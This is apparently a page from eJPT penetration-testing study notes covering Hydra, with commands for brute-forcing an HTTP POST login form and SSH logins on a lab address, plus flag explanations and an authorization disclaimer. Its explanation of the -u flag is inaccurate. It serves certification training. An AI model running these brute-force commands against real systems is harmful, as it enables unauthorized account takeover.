eJPT Junior Penetration Tester
ShopAuthorPatreonHTB Pro Labs
eJPT Junior Penetration Tester
eJPT Junior Penetration Tester
  • 🍕eJPT Study Notes
  • Author
  • eCPPTv2 Study Notes
  • INE eJPT Exam
    • Description
    • eJPT Certification
  • RFS Tips
    • Before the Exam
    • Prepare your Setup
    • Questions?
    • Start Hacking
  • Methodology
    • 1️⃣To Scan a Network
    • 2️⃣To Attack a Linux Machine
    • 3️⃣To Attack a Windows Machine
    • 4️⃣Pivoting Methodology
    • 5️⃣Linux Post Exploitation
    • 6️⃣Windows Post Exploitation
  • Community
    • LinkedIn
    • Discord
  • Networking
    • 🟢OSI Layers
    • 🟢Protocols
    • 🟢Subnetting
    • 🟢Routing
    • Pivoting
  • Network Protocols
    • 🟢FTP 21
    • 🟢SSH 22
    • ✅HTTP 80
    • 🟢NetBIOS 139
    • 🟠SMB 445
    • MySQL 3306
    • 🟢RDP 3389
  • Web Attacks
    • XSS
    • SQLi
    • Path Traversal
    • Command Injection
    • LFI - Local File Inclusion
    • LFI cheatsheet - HTB
  • Web CMS Attacks
    • Wordpress
    • Joomla
    • TomCat
  • Exploits
    • Search Exploits
    • Linux
    • Windows
  • Tools
    • dirb
    • 🟢Gobuster
    • Nmap
    • Netcat
    • Burpsuite
    • 🟢SQLMap
    • 🟢Metasploit
    • Hydra
    • 🟢John the Ripper
    • Hashcat
  • Web Tools
    • 😍RevShells
    • MD5 Crack
    • CyberChef
    • SecLists
  • TryHackMe Rooms
    • DogCat
    • Archangel
    • OWASP Juice Shop
  • Hack The Box Rooms
    • Page 2
  • Create Your Own Lab
    • Page 3
  • Other Resources
    • Page 1
  • TCM Security Courses
    • Page 4
Powered by GitBook
On this page

Was this helpful?

  1. Tools

Hydra

HTTP POST Form
hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh
hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh
// Some code

HTTP POST Form Attack Using Hydra

To launch a brute force attack against an HTTP POST form, you can use the following command with Hydra:

hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V

In this command:

  • Replace http://10.10.10.10/ with the target URL.

  • Adjust the /login.php:user=^USER^&password=^PASS^:Incorrect credentials string to match the form data and failure message.

  • The -L flag specifies a file with usernames, and -P specifies a file with passwords.

  • The -f flag tells Hydra to stop after the first correct password is found.

  • The -V flag increases the verbosity, showing the attempts in the output.

SSH Brute Forcing with Hydra

To perform a brute force attack on SSH, you can use Hydra with variations of the following commands:

For a list of users:

hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh

For a single user:

hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh

Notes:

  • The -v and -V flags are for verbose mode, showing the login attempts.

  • The -u flag is used to perform a username enumeration.

  • The -L and -l flags are for specifying the username list and a single username, respectively.

  • The -P flag is for the password list.

  • The -t flag controls the number of concurrent connections (threads).

Please ensure to have the correct permission and authorization before attempting any form of penetration testing. Unauthorized access is illegal and unethical.

PreviousMetasploitNextJohn the Ripper

Last updated 1 year ago

Was this helpful?